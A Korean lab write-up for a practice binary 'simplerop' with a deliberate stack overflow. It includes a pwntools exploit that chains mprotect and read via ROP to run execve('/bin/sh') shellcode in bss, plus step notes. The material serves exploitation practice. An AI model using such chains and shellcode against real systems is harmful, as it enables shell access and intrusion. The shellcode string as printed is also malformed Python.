190403-lab5

simplerop.c

#include <stdio.h>
 
int main(){
        char buf[20];
        puts("ROP is easy is'nt it ?");
        printf("Your input :");
        fflush(stdout);
        read(0,buf,100);
}

---

보호기법 확인

해당 바이너리는 system, exec계열의 함수가 빠져있다.

statically linked로 되어있기 때문에 mprotect의 주소를 가져올 수 있다. (leak을 안해도됨)

따라서 mprotect로 실행권한을 주고 shellcode를 직접 삽입해서 실행시킨다.

 

shellcode말고 syscall (int 0x80 명령어)를 통해서 shell을 실행할 수 있다.

sys_execve의 table번호가 0xb이기 때문에 eax = 0xb, ebx = &/bin/sh, ecx = 0x0, edx = 0x0으로

설정하고 int 0x80 명령어로 RET시키면 shell을 얻을 수 있다.

 

저는 전자의 방법을 선택했습니당.

 

---

slv.py

from pwn import *
 
p = process('./simplerop')
 
dummy = 'A'* (0x38-0x1c+0x4)
pop2ret_Addr = 0x0807b4e8
pop3ret_Addr = 0x08051d7c
bss_Addr = 0x80eb000
mprotect_Addr = 0x806d870
read_Addr = 0x806cd50
 
# gdb-peda command 'shellcode generate x86/linux exec'
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68
    \x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89
    \xca\x6a\x0b\x58\xcd\x80"
 
shellDummy = '\x90'*(0x200 - len(shellcode))
shellcode = shellDummy + shellcode
 
payload = ''
payload += dummy
 
payload += p32(mprotect_Addr)
payload += p32(pop3ret_Addr)
payload += p32(bss_Addr)
payload += p32(0x2000)
payload += p32(0x7)
 
payload += p32(read_Addr)
payload += p32(pop3ret_Addr)
payload += p32(0x0)
payload += p32(bss_Addr)
payload += p32(0x200)
payload += p32(bss_Addr)
 
# payload
# mprotect(bss_Addr, 0x2000, 0x7)
# read(0, bss_Addr, 0x200)
# ret bss_Addr(== jmp bss_Addr, call bss_Addr)
 
p.recvuntil(':')
p.send(payload)
 
p.send(shellcode)
p.interactive()
 

---

Exploit Flow

 

1. Gadget, bss, mprotect, read 주소 구하기

2. mprotect(bss_Addr, 0x2000, 0x7)로 bss_Addr ~ bss_Addr+0x2000에 0x7(read, write, execute)권한부여

3. read(0, bss_Addr, 0x200)으로 stdin으로 bss_Addr에 0x200byte만큼 쓰기

4. 생성한 shellcode send

5. Ret to bss_Addr

6. exploit.